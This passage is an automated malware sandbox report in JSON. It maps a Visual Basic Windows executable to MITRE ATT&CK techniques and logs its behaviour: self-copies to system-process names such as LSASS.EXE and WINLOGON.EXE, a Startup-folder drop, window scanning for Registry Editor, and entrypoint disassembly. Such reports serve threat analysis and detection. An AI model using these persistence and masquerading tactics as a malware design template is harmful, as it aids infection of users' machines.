"https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 2, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Peripheral Device Discovery", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120", "malicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CopyFileA\" to copy C:\\\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe to new location %WINDIR%\\D3_08.exe (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CopyFileA\" to copy C:\\\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe to new location C:\\D3_08.exe (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CopyFileA\" to copy C:\\\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CopyFileA\" to copy C:\\\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe to new location %WINDIR%\\system32\\MrD3_08.scr (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CopyFileA\" to copy C:\\\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CopyFileA\" to copy C:\\\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CopyFileA\" to copy C:\\\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CopyFileA\" to copy C:\\\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CopyFileA\" to copy C:\\\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CopyFileA\" to copy C:\\\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CopyFileA\" to copy C:\\\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CopyFileA\" to copy C:\\\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.pif to new location %WINDIR%\\D3_08.exe (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CopyFileA\" to copy C:\\\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.pif to new location C:\\D3_08.exe (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CopyFileA\" to copy C:\\\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.pif to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CopyFileA\" to copy C:\\\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.pif to new location %WINDIR%\\system32\\MrD3_08.scr (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CopyFileA\" to copy C:\\\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.pif to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CopyFileA\" to copy C:\\\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.pif to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CopyFileA\" to copy C:\\\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.pif to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CopyFileA\" to copy C:\\\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.pif to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CopyFileA\" to copy C:\\\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.pif to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CopyFileA\" to copy C:\\\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.pif to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CopyFileA\" to copy C:\\\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.pif to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CopyFileA\" to copy C:\\\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.scr to new location %WINDIR%\\D3_08.exe (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CopyFileA\" to copy C:\\\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.scr to new location C:\\D3_08.exe (UID: 00000000-00000940)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" called \"CopyFileA\" to copy C:\\\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.scr to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00000940)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-0", "type": 10, "name": "Loads the visual basic runtime environment", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"D3_08.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\msvbvm60.dll\" at 72940000\n \"D3_08.exe\" loaded module \"%WINDIR%\\msvbvm60.dll\" at 72940000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" searching for class \"RegEdit_RegEdit\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" searching for window \"Registry Editor\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" searching for window \"Folder Options\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" searching for window \"Local Settings\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" searching for class \"ExploreWClass\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" searching for class \"CabinetWClass\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" searching for class \"RebarWindow32\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" searching for class \"ComboBoxEx32\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" searching for class \"ComboBox\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" searching for class \"Edit\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" searching for class \"#32770\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"services.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"shell.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IExplorer.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.exe.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Data HAPUBWS.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Empty.pif\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"New Folder.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"CSRSS.EXE.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SERVICES.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.EXE.67E3CC1F.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SMSS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"LSASS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"MrD3_08.scr\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67E3CD97.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"WINLOGON.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.EXE.67E3CBAD.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"services.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"shell.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"IExplorer.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.exe.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"Data HAPUBWS.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"Empty.pif\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"New Folder.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"CSRSS.EXE.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"SERVICES.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, 